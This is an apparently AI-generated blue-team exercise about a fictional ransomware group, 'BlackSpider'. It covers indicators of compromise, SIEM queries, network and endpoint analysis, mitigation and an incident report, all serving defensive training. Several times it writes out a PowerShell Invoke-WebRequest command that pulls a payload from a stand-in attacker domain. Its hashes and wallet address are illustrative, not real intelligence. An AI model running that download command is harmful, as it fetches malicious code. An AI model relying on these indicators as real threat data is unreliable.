# Practical Exercise on threat intelligence Let's dive into another **Practical Exercise** focused on **threat intelligence utilization and detection**. This one will simulate an analysis of a campaign by a **ransomware threat actor**. *** #### **Scenario: Ransomware Campaign Detected** A report from a trusted threat intelligence source reveals that a ransomware group known as **"BlackSpider"** has been conducting attacks on financial organizations. The attackers use phishing emails to deliver a malicious Excel file, which downloads ransomware. The ransomware encrypts files and demands Bitcoin payment. *** #### **Threat Report Details** 1. **Executive Summary:** * BlackSpider is targeting financial institutions through phishing campaigns. * Malicious Excel files contain macros that download a payload, encrypt files, and exfiltrate sensitive data. * The ransomware communicates with its command-and-control (C2) servers for key exchange. 2. **Indicators of Compromise (IOCs):** * **Malicious Domains:** * `malicious-excel-c2.net` * `ransom-payload-c2.io` * **File Hashes:** * MD5: `8e35f4b5b1f4e723fe7c8bb67f29ec3a` * SHA256: `ab43a1b3e4d8cd94f71280e6ef6a248bcd0b25e923e77fc60b54d52b12045a38` * **PowerShell Commands:** * `Invoke-WebRequest -Uri http://malicious-excel-c2.net/payload.exe` * **Malware Executable Name:** `ransomware_payload.exe` * **Bitcoin Wallet Address:** `1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa` 3. **TTPs (Mapped to MITRE ATT\&CK):** * **Initial Access:** Phishing email with malicious Excel attachment (T1566.001). * **Execution:** Macro executes PowerShell to download the payload (T1059.001). * **Persistence:** Scheduled tasks to execute the ransomware at system startup (T1053.005). * **Impact:** Encrypting files and displaying a ransom note (T1486). 4. **Detection Recommendations:** * Monitor network traffic for connections to `malicious-excel-c2.net`. * Detect PowerShell commands that include suspicious `Invoke-WebRequest` activity. * Search endpoints for the malware hash and executable name. *** #### **Exercise: Simulated Detection and Analysis** **Step 1: Extract Key IOCs** 1. **Domains:** * `malicious-excel-c2.net` * `ransom-payload-c2.io` 2. **File Hashes:** * `8e35f4b5b1f4e723fe7c8bb67f29ec3a` * `ab43a1b3e4d8cd94f71280e6ef6a248bcd0b25e923e77fc60b54d52b12045a38` 3. **Commands:** * `Invoke-WebRequest -Uri http://malicious-excel-c2.net/payload.exe` 4. **Persistence Mechanism:** * Check scheduled tasks created by `ransomware_payload.exe`. *** **Step 2: Analyze Logs Using SIEM Queries** 1. **Search for Malicious Domains:** ```sql index=network_traffic | search dest_domain="malicious-excel-c2.net" OR dest_domain="ransom-payload-c2.io" ``` 2. **Look for File Hashes in Endpoint Logs:** ```sql index=endpoint_logs | search file_hash="8e35f4b5b1f4e723fe7c8bb67f29ec3a" OR file_hash="ab43a1b3e4d8cd94f71280e6ef6a248bcd0b25e923e77fc60b54d52b12045a38" ``` 3. **Detect PowerShell Commands:** ```sql index=endpoint_logs | search process_name="powershell.exe" AND command_line="Invoke-WebRequest -Uri http://malicious-excel-c2.net/payload.exe" ``` 4. **Investigate Scheduled Tasks:** ```sql index=endpoint_logs | search event_id=4698 AND task_name="ransomware_payload.exe" ``` *** **Step 3: Network Analysis** Using tools like Wireshark or Zeek, inspect for: 1. **Outbound Connections:** * Check for HTTP/HTTPS connections to `malicious-excel-c2.net`. * Example Wireshark filter: ```arduino arduinoCopy codehttp.host == "malicious-excel-c2.net" ``` 2. **Data Exfiltration:** * Look for abnormal file uploads to `ransom-payload-c2.io`. * Example Zeek script: ```bash bashCopy codecat http.log | grep "POST /upload" | grep "ransom-payload-c2.io" ``` *** **Step 4: Endpoint Analysis** Using an endpoint detection tool (e.g., CrowdStrike, Microsoft Defender): 1. Search for `ransomware_payload.exe` in process and file activity logs. 2. Investigate registry modifications for persistence: * Example registry path: `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`. * Use Windows Event ID `4657` to track registry changes. *** **Step 5: Mitigation Steps** 1. **Containment:** * Block `malicious-excel-c2.net` and `ransom-payload-c2.io` on your firewall and proxy. * Quarantine endpoints where `ransomware_payload.exe` is detected. 2. **Prevention:** * Disable macros in Excel by default across the organization. * Implement PowerShell script restrictions using Group Policy. 3. **Remediation:** * Remove persistence mechanisms (e.g., scheduled tasks, registry keys). * Restore files from backups if ransomware encryption is detected. *** **Step 6: Create an Incident Report** * **Summary of Attack:** * Describe the ransomware campaign and how it was delivered. * **Findings:** * List infected systems, identified IOCs, and suspicious activities. * **Actions Taken:** * Explain containment, eradication, and remediation steps. * **Recommendations:** * Suggest measures to strengthen defenses (e.g., phishing awareness, endpoint monitoring). \--- Let’s start with **writing a simulated SIEM query**, **crafting a mitigation plan**, and **creating a detailed incident report** for the scenario. *** #### **1. SIEM Query Examples** **a. Network Traffic Analysis** **Objective:** Detect any communication with malicious domains. **Query:** ```sql index=network_traffic | search dest_domain="malicious-excel-c2.net" OR dest_domain="ransom-payload-c2.io" | stats count by src_ip, dest_ip, dest_domain, timestamp ``` **Explanation:** This query searches for traffic to the malicious domains and provides the source IPs, destination IPs, domains, and timestamps for each occurrence. *** **b. Endpoint File Hash Detection** **Objective:** Identify endpoints where malicious files have been detected. **Query:** ```sql index=endpoint_logs | search file_hash="8e35f4b5b1f4e723fe7c8bb67f29ec3a" OR file_hash="ab43a1b3e4d8cd94f71280e6ef6a248bcd0b25e923e77fc60b54d52b12045a38" | stats count by host_name, file_path, file_hash, timestamp ``` **Explanation:** This checks endpoint logs for the ransomware file hashes and lists the hosts, file paths, and timestamps where they were detected. *** **c. PowerShell Command Detection** **Objective:** Find suspicious PowerShell commands used to download ransomware. **Query:** ```sql index=endpoint_logs | search process_name="powershell.exe" AND command_line="*Invoke-WebRequest*malicious-excel-c2.net*" | stats count by host_name, user, command_line, timestamp ``` **Explanation:** This detects PowerShell commands containing the `Invoke-WebRequest` function and logs the details of the affected hosts and users. *** **d. Scheduled Task Persistence Detection** **Objective:** Identify the creation of malicious scheduled tasks. **Query:** ```sql index=endpoint_logs | search event_id=4698 AND task_name="ransomware_payload.exe" | stats count by host_name, task_name, timestamp ``` **Explanation:** Monitors for Event ID 4698, which logs the creation of new scheduled tasks, focusing on the ransomware’s persistence mechanism. *** #### **2. Mitigation Plan** **a. Containment** 1. **Block Malicious Domains:** * Add `malicious-excel-c2.net` and `ransom-payload-c2.io` to the firewall or proxy blocklist. 2. **Isolate Infected Hosts:** * Disconnect any endpoints showing evidence of the ransomware. 3. **Disable Macros Organization-Wide:** * Use Group Policy to disable macros in Microsoft Office documents. *** **b. Remediation** 1. **Remove Malicious Files:** * Use EDR tools to delete `ransomware_payload.exe` from all infected endpoints. 2. **Eliminate Persistence Mechanisms:** * Delete any malicious scheduled tasks or registry entries. * Remove registry key: `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ransomware_payload.exe`. 3. **Restore Encrypted Files:** * Recover data from known good backups. *** **c. Prevention** 1. **Email Security:** * Enable attachment scanning for phishing emails. * Train users to recognize phishing attempts. 2. **Endpoint Security:** * Deploy advanced EDR solutions for proactive monitoring. 3. **Restrict PowerShell Usage:** * Enforce PowerShell Constrained Language Mode. * Monitor for unauthorized script executions. *** #### **3. Incident Report** **Subject: Incident Report - BlackSpider Ransomware Campaign** *** **Incident Summary:** On \[date], a ransomware campaign by the threat actor group **BlackSpider** was identified targeting our organization. The ransomware was distributed via phishing emails containing malicious Excel attachments. The payload encrypted files and exfiltrated data to command-and-control servers. *** **Findings:** 1. **Affected Systems:** * Host: `Finance-PC-01` * Host: `Admin-Laptop` 2. **Indicators of Compromise:** * Malicious domains: `malicious-excel-c2.net`, `ransom-payload-c2.io` * File hashes: `8e35f4b5b1f4e723fe7c8bb67f29ec3a`, `ab43a1b3e4d8cd94f71280e6ef6a248bcd0b25e923e77fc60b54d52b12045a38` * PowerShell commands: `Invoke-WebRequest -Uri http://malicious-excel-c2.net/payload.exe` * Scheduled task: `ransomware_payload.exe` *** **Actions Taken:** 1. **Containment:** * Blocked malicious domains on firewalls and proxies. * Isolated affected endpoints. 2. **Remediation:** * Removed malicious files from infected hosts. * Deleted registry entries and scheduled tasks used for persistence. * Restored encrypted files from backups. 3. **Preventive Measures:** * Disabled macros across the organization. * Enabled PowerShell script logging. * Conducted phishing awareness training for employees. *** **Recommendations:** 1. Enhance email security by implementing sandboxing for attachments. 2. Monitor for PowerShell activity using logging and SIEM queries. 3. Regularly update antivirus and endpoint security solutions. 4. Review and update incident response playbooks for ransomware attacks.